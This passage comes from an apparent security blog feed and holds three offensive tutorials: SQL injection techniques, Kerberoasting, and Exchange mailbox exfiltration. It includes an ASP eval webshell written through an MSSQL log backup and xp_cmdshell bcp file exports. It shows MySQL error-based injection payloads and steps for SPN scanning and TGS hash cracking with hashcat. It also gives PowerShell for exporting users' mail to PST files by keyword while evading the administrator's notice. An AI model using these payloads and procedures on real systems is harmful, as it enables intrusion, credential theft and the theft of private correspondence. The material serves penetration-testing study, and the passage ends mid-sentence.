class="line"><span class="number">0x3C256576616C20726571756573742822732229253E</span> -> <%eval request(<span class="string">"s"</span>)%></div></pre></td></tr></table></figure></p><p>进行增量备份<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">backup</span> <span class="keyword">log</span> database_name </div><div class="line"><span class="keyword">to</span> disk = <span class="string">'c:\1.asp'</span></div></pre></td></tr></table></figure></p><h3 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h3><p>将数据插入本地表<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span 
class="keyword">create</span> <span class="keyword">table</span> temp (<span class="keyword">data</span> <span class="built_in">text</span>)</div><div class="line"><span class="keyword">bulk</span> <span class="keyword">insert</span> temp <span class="keyword">from</span> <span class="string">'d:\test.txt'</span> <span class="keyword">with</span> (codepage=<span class="string">'RAW'</span>)</div></pre></td></tr></table></figure></p><p>bcp {dbtable | query} {in | out | queryout | format} 数据文件<br>数据库名dbtable -> in/out<br>查询query -> queryout</p><p>远程连接攻击数据库导出为文件<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">EXEC master..xp_cmdshell 'bcp "<span class="keyword">SELECT</span> * <span class="keyword">FROM</span> test.dbo.temp<span class="string">" queryout d:\tset1.txt -c -S"</span>服务器地址<span class="string">" -U"</span>username<span class="string">" -P"</span><span class="keyword">password</span><span class="string">"'</span></div></pre></td></tr></table></figure></p><p>在数据库中<br>导出test数据库中temp表内容到文件(二进制文件也行)<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">EXEC master..xp_cmdshell 'bcp test.dbo.temp out d:\tset1.txt -c -T' </div><div class="line">EXEC master..xp_cmdshell 'bcp "<span class="keyword">select</span> * <span class="keyword">from</span> test.dbo.temp<span class="string">" queryout "</span>d:\test.exe<span class="string">" -c -T'</span></div></pre></td></tr></table></figure></p><h2 id="Oracle"><a href="#Oracle" class="headerlink" title="Oracle"></a>Oracle</h2>]]></content>
<summary type="html">
<h2 id="MYSQL"><a href="#MYSQL" class="headerlink" title="MYSQL"></a>MYSQL</h2><p>Downloads for all MySQL versions<br><a href="http://mirrors.sohu.com/mysql/" target="_blank" rel="external">http://mirrors.sohu.com/mysql/</a></p>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="Error-based injection"></a>Error-based injection</h3><h4 id="常用报错函数"><a href="#常用报错函数" class="headerlink" title="Common error-raising functions"></a>Common error-raising functions</h4><p>FLOOR(X) rounds down to the nearest integer</p>
<p>select FLOOR(12.2) -&gt; 12</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">UNION</span> ALL <span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="keyword">user</span>(),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x</div><div class="line"></div><div class="line">[Err] <span class="number">1062</span> - <span class="keyword">Duplicate</span> entry <span class="string">'root@localhost1'</span> <span class="keyword">for</span> <span class="keyword">key</span> <span class="string">'group_key'</span></div><div class="line"></div><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="keyword">version</span>(),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span 
class="keyword">by</span> x)a);</div></pre></td></tr></table></figure>
<p>XML document support</p>
<p>ExtractValue() has a 32-character length limit on the returned value</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (extractvalue(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x7e</span>)));</div></pre></td></tr></table></figure>
<p>[Err] 1105 - XPATH syntax error: '~root@localhost~'</p>
<p>UpdateXML()</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (updatexml(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x7e</span>),<span class="number">1</span>));</div></pre></td></tr></table></figure>
<p>[Err] 1105 - XPATH syntax error: '~root@localhost~'</p>
</summary>
</entry>
<entry>
<title>SPNs</title>
<link href="http://ruos.org/2017/11/01/SPNs/"/>
<id>http://ruos.org/2017/11/01/SPNs/</id>
<published>2017-11-01T06:12:47.000Z</published>
<updated>2017-11-01T06:15:10.914Z</updated>
<content type="html"><![CDATA[<p>First, a look at the Kerberos authentication protocol.</p><p>Kerberos Overview & Communication Process:</p><p><img src="https://www.ibm.com/developerworks/cn/data/library/techarticles/dm-0809govindarajan/image001.gif" alt=""></p><p>The KDC (Key Distribution Center) consists of two services: the Authentication Server (AS) and the Ticket Granting Server (TGS).</p><p>User logs on with username & password.</p><p>Client authentication</p><ol><li>The client sends the user ID to the AS as a cleartext message.</li><li>The AS returns a session key encrypted with the user's password and a TGT encrypted with the krbtgt password.</li><li>The client decrypts the message with the user's password to obtain the session key, which is used for further communication with the TGS.</li></ol><p>Client service authorization</p><ol><li>The client sends the TGT and an authenticator encrypted with the Client/TGS session key.</li><li>The TGS decrypts the TGT to obtain the session key and uses it to decrypt the authenticator; if the IDs match, it returns a client-to-server ticket encrypted with the service's password and a client/server session key (session key2) encrypted with the Client/TGS session key.</li></ol><p>Client service request</p><ol><li>The client sends a new authenticator encrypted with session key2 together with the service ticket.</li><li>The server decrypts the service ticket with its own password and provides the service.</li></ol><h3 id="Service-Principal-Names"><a href="#Service-Principal-Names" class="headerlink" title="Service Principal Names"></a>Service Principal Names</h3><p>A Service Principal Name (SPN) is a unique identifier for a service instance. Kerberos authentication uses SPNs to associate a service instance with a service logon account. Configuring an SPN for the MSSQL service serves as the example.<br><a href="https://technet.microsoft.com/zh-cn/library/bb735885.aspx" target="_blank" rel="external">https://technet.microsoft.com/zh-cn/library/bb735885.aspx</a></p><a id="more"></a><p>S1. Register an SPN for the SQL Server service account.</p><p>Manual registration<br>setspn -A MSSQLSvc/myhost.redmond.microsoft.com:1433 accountname<br>For a named instance<br>setspn -A MSSQLSvc/myhost.redmond.microsoft.com/instancename accountname </p><p>View the SPNs registered for a user<br><code>setspn -L ruos\sql-service</code></p><p>View the user's attributes with ADSI Edit (adsiedit.msc)</p><p><img src="https://i.imgur.com/bayB8a4.png" alt=""></p><p>S2. Grant the user the right to log on as a service in AD.</p><p>GPO_name\Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment<br>Log on as a service</p><p><img src="https://i.imgur.com/8o7zha7.png" alt=""></p><p>S3. Change the SQL Server service account to the domain user account.</p><h3 id="暴力破解Kerberos-TGS-Tickets"><a href="#暴力破解Kerberos-TGS-Tickets" class="headerlink" title="Brute-forcing Kerberos TGS tickets"></a>Brute-forcing Kerberos TGS tickets</h3><p>When the encryption type is RC4_HMAC_MD5, the TGS-REP in step four of the Kerberos exchange returns a ticket encrypted with the service account's NTLM password hash.</p><p>S1. SPN scanning</p><p><code>setspn -T domain -q */*</code></p><p>or<br><a href="https://github.com/PyroTek3/PowerShell-AD-Recon/" target="_blank" rel="external">https://github.com/PyroTek3/PowerShell-AD-Recon/</a></p><p><img src="https://i.imgur.com/56AHj7q.png" alt=""></p><p>S2. Request Kerberos tickets for the SPN<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">PS C:\> <span class="built_in">Add-Type</span> -AssemblyName System.IdentityModel</div><div class="line">PS C:\> <span class="built_in">New-Object</span> System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList <span class="string">"MSSQLSvc/WEBTST01.ruos.org/SQLEXPRESS"</span></div></pre></td></tr></table></figure></p><p>S3. View and export the tickets</p><p><img src="https://i.imgur.com/qvvPXcA.png" alt=""></p><blockquote><p>The default encryption type is aes256_hmac, which tgsrepcrack cannot crack; the encryption type can be set to RC4_HMAC_MD5 in the server's group policy.<br>GPO_name\Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options<br>Network security: Configure encryption types allowed for Kerberos</p></blockquote><p>S4. Offline cracking</p><p>tgsrepcrack (RC4_HMAC_MD5 only), or save the hash and crack it with hashcat.</p><p><img src="https://i.imgur.com/o8WPRlS.png" alt=""></p><p>S1. Export the hash (for other encryption types)<br>GetUserSPNs.py -request -outputfile hash.txt -dc-ip 192.168.6.2 ruos.org/user2<br>or export it from a ticket: kirbi2john.py 1-40a00000-user2@MSSQLSvc~WEBTST01.ruos.org~SQLEXPRESS-RUOS.ORG.kirbi<br>S2. hashcat64.exe -m 13100 hash.txt example.dict --force</p><p><a href="https://github.com/nidem/kerberoast" target="_blank" rel="external">https://github.com/nidem/kerberoast</a><br><a href="https://github.com/coresecurity/impacket" target="_blank" rel="external">https://github.com/coresecurity/impacket</a><br><a href="https://github.com/nidem/kerberoast/blob/master/kirbi2john.py" target="_blank" rel="external">https://github.com/nidem/kerberoast/blob/master/kirbi2john.py</a></p><h3 id="其他"><a href="#其他" class="headerlink" title="Other"></a>Other</h3><p><a href="https://msdn.microsoft.com/zh-cn/library/windows/apps/dn194200(v=sql.110).aspx" target="_blank" rel="external">https://msdn.microsoft.com/zh-cn/library/windows/apps/dn194200(v=sql.110).aspx</a></p>]]></content>
<summary type="html">
<p>First, a look at the Kerberos authentication protocol.</p>
<p>Kerberos Overview &amp; Communication Process:</p>
<p><img src="https://www.ibm.com/developerworks/cn/data/library/techarticles/dm-0809govindarajan/image001.gif" alt=""></p>
<p>The KDC (Key Distribution Center) consists of two services: the Authentication Server (AS) and the Ticket Granting Server (TGS).</p>
<p>User logs on with username &amp; password.</p>
<p>Client authentication</p>
<ol>
<li>The client sends the user ID to the AS as a cleartext message.</li>
<li>The AS returns a session key encrypted with the user's password and a TGT encrypted with the krbtgt password.</li>
<li>The client decrypts the message with the user's password to obtain the session key, which is used for further communication with the TGS.</li>
</ol>
<p>Client service authorization</p>
<ol>
<li>The client sends the TGT and an authenticator encrypted with the Client/TGS session key.</li>
<li>The TGS decrypts the TGT to obtain the session key and uses it to decrypt the authenticator; if the IDs match, it returns a client-to-server ticket encrypted with the service's password and a client/server session key (session key2) encrypted with the Client/TGS session key.</li>
</ol>
<p>Client service request</p>
<ol>
<li>The client sends a new authenticator encrypted with session key2 together with the service ticket.</li>
<li>The server decrypts the service ticket with its own password and provides the service.</li>
</ol>
<h3 id="Service-Principal-Names"><a href="#Service-Principal-Names" class="headerlink" title="Service Principal Names"></a>Service Principal Names</h3><p>A Service Principal Name (SPN) is a unique identifier for a service instance. Kerberos authentication uses SPNs to associate a service instance with a service logon account. Configuring an SPN for the MSSQL service serves as the example.<br><a href="https://technet.microsoft.com/zh-cn/library/bb735885.aspx" target="_blank" rel="external">https://technet.microsoft.com/zh-cn/library/bb735885.aspx</a></p>
</summary>
</entry>
<entry>
<title>域渗透之Exchange Server</title>
<link href="http://ruos.org/2017/07/27/exchange%20server/"/>
<id>http://ruos.org/2017/07/27/exchange server/</id>
<published>2017-07-27T01:56:16.000Z</published>
<updated>2018-05-08T04:22:57.870Z</updated>
<content type="html"><![CDATA[<p><img src="https://i-technet.sec.s-msft.com/Areas/Epx/Themes/TechNet/Content/Images/BrandLogoExchange.png?v=636437933426396895" alt=""></p><blockquote><p>Microsoft Exchange Server is a messaging and collaboration system. It offers industry-leading scalability, high reliability, security and high throughput, and many companies, schools and government bodies use it as their primary mail system. In an internal penetration test, control of the mail system gets you twice the result for half the effort, especially with Exchange, which is tied to AD.</p></blockquote><p>This article covers the basic operations on Exchange mail from PowerShell; they apply equally to day-to-day administration, though they barely scratch the surface of the Exchange Management Shell. The environment below is Exchange Server 2013; the steps also apply to 2010 and other versions.</p><p>You can connect to the Exchange server through the Exchange Management Shell (EMS) shortcut in the Start menu; after initialization you get a PowerShell command window. If the connection fails, believe me, it is because you have not allocated enough memory: even a default Exchange install needs at least 6 GB.</p><p>If everything works and you already hold domain controller privileges, let's begin!</p><a id="more"></a><h2 id="导出邮箱列表"><a href="#导出邮箱列表" class="headerlink" title="Exporting the mailbox list"></a>Exporting the mailbox list</h2><h4 id="查看数据库"><a href="#查看数据库" class="headerlink" title="Viewing databases"></a>Viewing databases</h4><p>A mailbox database is the unit of granularity in which mailboxes are created and stored. Mailbox databases are stored as Exchange database (.edb) files, on either direct-attached storage (DAS) or a storage area network (SAN). The Get-MailboxDatabase cmdlet retrieves one or more mailbox database objects from a server or from the organization. For high availability there are usually at least two servers in a DAG; the -Server parameter selects which server to query.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>get-mailboxdatabase -Server "exchange"</div><div class="line"></div><div class="line">Name Server Recovery ReplicationType</div><div class="line">---- ------ -------- ---------------</div><div class="line">Mailbox Database 0574336487 EXCHANGE False None</div><div class="line">Mailbox Database Test01 EXCHANGE False None</div></pre></td></tr></table></figure></p><p>Format and filter specific properties, such as the database file path<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\>Get-MailboxDatabase -Identity 'Mailbox Database Test01' | Format-List Name,EdbFilePath,LogFolderPath</div><div class="line"></div><div class="line">Name : Mailbox Database Test01</div><div class="line">EdbFilePath : C:\Program Files\Microsoft\Exchange Server\V15\Mailbox\Mailbox Database Test01\Mailbox Database Test01.edb</div><div class="line">LogFolderPath : C:\Program Files\Microsoft\Exchange Server\V15\Mailbox\Mailbox Database Test01</div></pre></td></tr></table></figure></p><p>Database management location in the ECP</p><p><img src="http://i.imgur.com/JT1pMQf.png" alt=""></p><h4 id="获取组"><a href="#获取组" class="headerlink" title="Getting groups"></a>Getting groups</h4><p>After creating an OU (Organizational Unit) on the domain controller, groups are usually created to manage users. Querying groups is worthwhile because you will often find a group named something like IT; this step is much the same as net group. The Get-DistributionGroup cmdlet queries the existing distribution groups.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-DistributionGroup</div><div class="line"></div><div class="line">Name DisplayName GroupType PrimarySmtpAddress</div><div class="line">---- ----------- --------- ------------------</div><div class="line">EXchange New OU EXchange New OU Universal ENO@ruos.org</div><div class="line">IT Security IT Security Universal, SecurityEnabled it-security@ruos.org</div></pre></td></tr></table></figure></p><p>View the details of the IT Security distribution group<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-DistributionGroup "IT Security" | fl</div><div class="line"></div><div class="line"></div><div class="line">RunspaceId : efbb60f9-5ef1-4a8d-9b94-c3f102e576c3</div><div class="line">GroupType : Universal, SecurityEnabled</div><div class="line">SamAccountName : IT Security</div><div class="line">BypassNestedModerationEnabled : False</div><div class="line">ManagedBy : {ruos.org/Users/Administrator, ruos.org/Users/admin}</div><div class="line">MemberJoinRestriction : Closed</div><div class="line">MemberDepartRestriction : Closed</div><div class="line">...</div></pre></td></tr></table></figure></p><p>Export to a CSV file<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># Query distribution groups</span></div><div class="line">Get-DistributionGroup | `</div><div class="line"><span class="built_in">Select-Object</span> DisplayName,Name,Alias,GroupType,WindowsEmailAddress,@{n=<span class="string">"ManagedBy"</span>;e={<span class="variable">$_</span>.ManagedBy -Join <span class="string">";"</span>}} ,OrganizationalUnit | `</div><div class="line"><span class="built_in">Export-CSV</span> test.csv -NoType</div></pre></td></tr></table></figure></p><h4 id="获得组成员"><a href="#获得组成员" class="headerlink" title="Getting group members"></a>Getting group members</h4><p>The Get-DistributionGroupMember cmdlet lists the members of an existing distribution group.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-DistributionGroupMember -Identity "ENO"</div><div class="line"></div><div class="line">Name RecipientType</div><div class="line">---- -------------</div><div class="line">Administrator UserMailbox</div><div class="line">a UserMailbox</div><div class="line">ming xiao UserMailbox</div><div class="line">user1 UserMailbox</div></pre></td></tr></table></figure></p><h4 id="获得用户admin(可以是域用户格式)邮箱信息"><a href="#获得用户admin(可以是域用户格式)邮箱信息" class="headerlink" title="Getting mailbox information for user admin (domain user format also works)"></a>Getting mailbox information for user admin (domain user format also works)</h4><p>Get the user's mailbox information. The steps above showed how to query the members of a user group; next, the Get-Mailbox cmdlet retrieves mailbox objects and their attributes, and the Get-MailboxStatistics cmdlet adds information about the mailbox such as its size, the number of items it contains and the last logon time.</p><p>Basic usage<br>Get-Mailbox | Format-Table Name,WindowsEmailAddress<br>Get-Mailbox testuser | fl * | Out-File c:\mb.txt<br>Get-Mailbox | ForEach-Object {$_.Name}</p><p>Get the users in an organizational unit<br>Get-Mailbox -OrganizationalUnit "New OU"<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>get-mailboxstatistics -identity admin | Select DisplayName,ItemCount,TotalItemSize,LastLogonTime</div><div class="line"></div><div class="line">DisplayName ItemCount TotalItemSize LastLogonTime</div><div class="line">----------- --------- ------------- -------------</div><div class="line">admin 11 90.88 KB (93,056 bytes) 2016/11/29 19:59:08</div></pre></td></tr></table></figure></p><p>Viewing in Format-Table mode</p><blockquote><p>Use a backtick ` to continue a command on the next line; press Enter after the last line to execute.</p></blockquote><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># View information for all mailboxes</span></div><div class="line">Get-Mailbox -ResultSize Unlimited | `</div><div class="line">Get-MailboxStatistics | `</div><div class="line"><span class="built_in">Sort-Object</span> TotalItemSize -Descending | `</div><div class="line">ft DisplayName,@{label=<span class="string">"Mailbox Size (MB)"</span>;expression={<span class="variable">$_</span>.TotalItemSize.Value.ToMB()}}</div></pre></td></tr></table></figure><p>Export to a CSV file (this is what you want)</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$mb</span> = Get-Mailbox -ResultSize Unlimited</div><div class="line"><span class="variable">$output</span> = <span class="keyword">foreach</span>(<span class="variable">$obj</span> <span class="keyword">in</span> <span class="variable">$mb</span> ){</div><div class="line"> <span class="variable">$ms</span> = (Get-MailboxStatistics <span class="variable">$obj</span>.Identity -WarningAction SilentlyContinue )</div><div class="line"><span class="variable">$obj</span> | <span class="built_in">Select-Object</span> DisplayName,Name,WindowsEmailAddress,OrganizationalUnit,Database,`</div><div class="line">@{L=<span class="string">"Mailbox Size (MB)"</span>;E={ <span class="variable">$ms</span>.TotalItemSize.Value.ToMB() }},`</div><div class="line">@{L=<span class="string">"LastLogonTime"</span>;E={ <span class="variable">$ms</span>.LastLogonTime }}</div><div class="line">}</div><div class="line"><span class="variable">$output</span> | <span class="built_in">Export-CSV</span> test.csv -NoType</div></pre></td></tr></table></figure><p>Or export through the ECP</p><p><img src="http://i.imgur.com/N1mmgDy.jpg" alt=""></p><h2 id="导出PST邮件"><a href="#导出PST邮件" class="headerlink" title="Exporting mail to PST"></a>Exporting mail to PST</h2><p>Having seen how the users' mailboxes are used, the next step is to export the mailbox data to PST files so it can be viewed and searched locally.<br><strong>In Exchange Server 2010 SP1 the user mailbox export feature is only available through the EMS, and the Exchange administrator performing it must hold the Mailbox Import Export role.</strong></p><blockquote><p>Exchange Server 2007 can use the Export-Mailbox cmdlet </p></blockquote><p>Exporting mail takes the following steps:</p><ul><li>Step1 Grant the user export permission</li><li>Step2 Export the mail</li><li>Step3 View the export request and remove it</li></ul><h4 id="查看角色(默认只有组织管理成员才有导入-导出权限)"><a href="#查看角色(默认只有组织管理成员才有导入-导出权限)" class="headerlink" title="Viewing roles (by default only Organization Management members have import/export permission)"></a>Viewing roles (by default only Organization Management members have import/export permission)</h4><p>The Get-ManagementRole cmdlet lists the management roles created in the organization.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-ManagementRole</div><div class="line"></div><div class="line">Name RoleType</div><div class="line">---- --------</div><div class="line">Mailbox Import Export MailboxImportExport</div></pre></td></tr></table></figure></p><p>The Get-ManagementRoleAssignment cmdlet retrieves management role assignments.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-ManagementRoleAssignment -role "Mailbox Import Export" | Format-List RoleAssigneeName</div><div class="line"></div><div class="line">RoleAssigneeName : Organization Management</div><div class="line"></div><div class="line">RoleAssigneeName : Administrator</div></pre></td></tr></table></figure></p><h4 id="为用户Administrator添加邮箱导入导出角色"><a href="#为用户Administrator添加邮箱导入导出角色" class="headerlink" title="Assigning the Mailbox Import Export role to user Administrator"></a>Assigning the Mailbox Import Export role to user Administrator</h4><p>The New-ManagementRoleAssignment cmdlet assigns a management role to a management role group, a management role assignment policy, a user or a universal security group (USG).</p><blockquote><p>Restart the EMS after adding the role</p></blockquote><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>New-ManagementRoleAssignment -Name "Import Export_Domain Admins" `</div><div class="line">>>-User "Administrator" -Role "Mailbox Import Export"</div><div class="line">>></div><div class="line"></div><div class="line">DataObject : Import Export_Domain Admins</div><div class="line">User : ruos.org/Users/Administrator</div><div class="line">AssignmentMethod : Direct</div><div class="line">Identity : Import Export_Domain Admins</div><div class="line">EffectiveUserName : Administrator</div></pre></td></tr></table></figure><p>Remove a management role assignment</p><p><code>Remove-ManagementRoleAssignment "Import Export_Domain Admins" -Confirm:$false</code></p><h4 id="New-MailboxExportRequest-cmdlet-将主邮箱或存档的内容导出到-pst-文件。"><a href="#New-MailboxExportRequest-cmdlet-将主邮箱或存档的内容导出到-pst-文件。" class="headerlink" title="The New-MailboxExportRequest cmdlet exports the contents of a primary mailbox or archive to a .pst file."></a>The New-MailboxExportRequest cmdlet exports the contents of a primary mailbox or archive to a .pst file.</h4><p>Create a read/write shared folder with net share</p><p><code>net share sharename$=c:\share /GRANT:Everyone,FULL</code></p><p>Export all mail in user1's inbox to a .pst </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">New-MailboxExportRequest -Mailbox user1 -IncludeFolders <span class="string">"#Inbox#"</span> -FilePath \\<span class="number">10.2</span>.<span class="number">2.163</span>\maildata\user1.pst</div></pre></td></tr></table></figure><blockquote><p>Inbox, SentItems (sent mail), DeletedItems (deleted mail), Drafts</p></blockquote><p>Export the messages user Tony received before 1 January 2012 whose body contains "company" and "profit". </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">New-MailboxExportRequest -Mailbox Tony `</div><div class="line">-ContentFilter {(body <span class="nomarkup">-like</span> <span class="string">"*company*"</span>) `</div><div class="line">-and (body <span class="nomarkup">-like</span> <span class="string">"*profit*"</span>) `</div><div class="line">-and (Received <span class="nomarkup">-lt</span> <span class="string">"01/01/2012"</span>)} `</div><div class="line">-FilePath <span class="string">"\\SERVER01\PSTFileShare\Tony_CompanyProfits.pst"</span></div></pre></td></tr></table></figure><p>You can then load it into Outlook to view it.</p><h4 id="查看导出请求状态"><a href="#查看导出请求状态" class="headerlink" title="Viewing export request status"></a>Viewing export request status</h4><p>The Get-MailboxExportRequest cmdlet shows the detailed status of the running export requests started with New-MailboxExportRequest.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-MailboxExportRequest</div><div class="line"></div><div class="line">Name Mailbox Status</div><div class="line">---- ------- ------</div><div class="line">MailboxExport ruos.org/Users/a Completed</div></pre></td></tr></table></figure></p><h4 id="删除全部或部分完成的导出请求"><a href="#删除全部或部分完成的导出请求" class="headerlink" title="Removing fully or partially completed export requests"></a>Removing fully or partially completed export requests</h4><p><code>[PS] C:\Windows\system32>Remove-MailboxExportRequest -Identity "a\MailboxExport"</code></p><p>Remove all export requests whose status is Completed</p><p><code>Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest -Confirm:$false</code></p><p>Or export through the ECP; the drawbacks are that you cannot filter by time and the administrator receives a notification when the export completes.</p><p><img src="http://i.imgur.com/L24RI8O.jpg" alt=""></p><p>The above showed how to export user mail through the EMS, but nobody can guarantee you will not run straight into the administrator. Fortunately, Exchange Server supports remote PowerShell.</p><h2 id="Exchange-PowerShell"><a href="#Exchange-PowerShell" class="headerlink" title="Exchange PowerShell"></a>Exchange PowerShell</h2><p>Remote PowerShell provides a way to manage Exchange Online from the command line, which benefits everyone.</p><h4 id="创建用户凭证"><a href="#创建用户凭证" class="headerlink" title="Creating user credentials"></a>Creating user credentials</h4><p><code>$Credential = Get-Credential</code></p><p>But that pops up a credential prompt; use PSCredential to create a non-interactive logon credential.</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$pass</span> = <span class="built_in">ConvertTo-SecureString</span> <span class="string">"PlainTextPassword"</span> -AsPlainText -Force</div><div class="line"><span class="variable">$Credential</span> = <span class="built_in">New-Object</span> System.Management.Automation.PSCredential (<span class="string">"Domain01\User01"</span>, <span class="variable">$pass</span>)</div></pre></td></tr></table></figure><h4 id="创建登陆会话"><a href="#创建登陆会话" class="headerlink" title="Creating the logon session"></a>Creating the logon session</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$Session</span> = <span class="built_in">New-PSSession</span> -ConfigurationName Microsoft.Exchange `</div><div class="line">-ConnectionUri http://&lt;FQDN of Exchange <span class="number">2016</span> Mailbox server&gt;/PowerShell/ `</div><div class="line">-Authentication Kerberos -Credential <span class="variable">$Credential</span></div></pre></td></tr></table></figure><h4 id="导入会话"><a href="#导入会话" class="headerlink" title="Importing the session"></a>Importing the session</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Import-PSSession</span> <span class="variable">$Session</span></div></pre></td></tr></table></figure><h4 id="移除会话"><a href="#移除会话" class="headerlink" title="Removing the session"></a>Removing the session</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Remove-PSSession</span> <span class="variable">$Session</span></div></pre></td></tr></table></figure><h2 id="Scripting-with-the-Exchange-Management-Shell"><a href="#Scripting-with-the-Exchange-Management-Shell" class="headerlink" title="Scripting with the Exchange Management Shell"></a>Scripting with the Exchange Management Shell</h2><p>Run scripts through the shell.<br>Applies to: Exchange Server 2013</p><p>The default Exchange root directory is &lt;root drive&gt;:\Program 